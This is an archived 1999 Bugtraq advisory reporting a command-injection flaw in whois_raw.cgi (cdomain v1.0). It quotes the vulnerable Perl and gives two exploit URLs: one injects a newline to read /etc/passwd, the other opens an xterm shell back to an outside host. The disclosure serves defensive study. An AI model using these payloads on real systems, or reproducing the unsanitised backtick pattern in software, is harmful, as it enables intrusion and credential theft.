[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: whois_raw.cgi problem
From: Salvatore Sanfilippo -antirez- <md5330 () MCLINK ! IT>
Date: 1999-05-31 22:34:51
[Download RAW message or body]
Hi,
sorry if this has already been known.
There is a problem in whois_raw.cgi, called from
whois.cgi. whois_raw.cgi is part of cdomain v1.0.
I don't know if new versions are vulnerable.
#!/usr/bin/perl
#
# whois_raw.cgi Written by J. Allen Hatch (zone@berkshire.net)
# 04/17/97
#
# This script is part of the cdomain v1.0 package which is available at:
# http://www.your-site.com/~zone/whois.html
...
require ("/usr/lib/perl5/cgi-lib.pl");
...
$fqdn = $in{'fqdn'};
# Fetch the root name and concatenate
# Fire off whois
if ($in{'root'} eq "it") {
@result=`$whois_cmd_it $fqdn`;
} elsif ($in{'fqdn'} eq "alicom.com" || $in{'fqdn'} eq "alicom.org") {
@result="Dettagli non disponibili per il dominio richiesto.";
} else {
@result=`$whois_cmd $fqdn`;
}
...
The exploit is banal and well known problem:
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0
bye,
antirez
--
Salvatore Sanfilippo antirez | md5330@mclink.it | antirez@alicom.com
try hping: http://www.kyuzz.org/antirez antirez@seclab.com
'se la barca non ce l'hai dove uzba te ne vai?
se la barca te la ruba, preo.' (M. Abruscato & O. Carmeci)
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic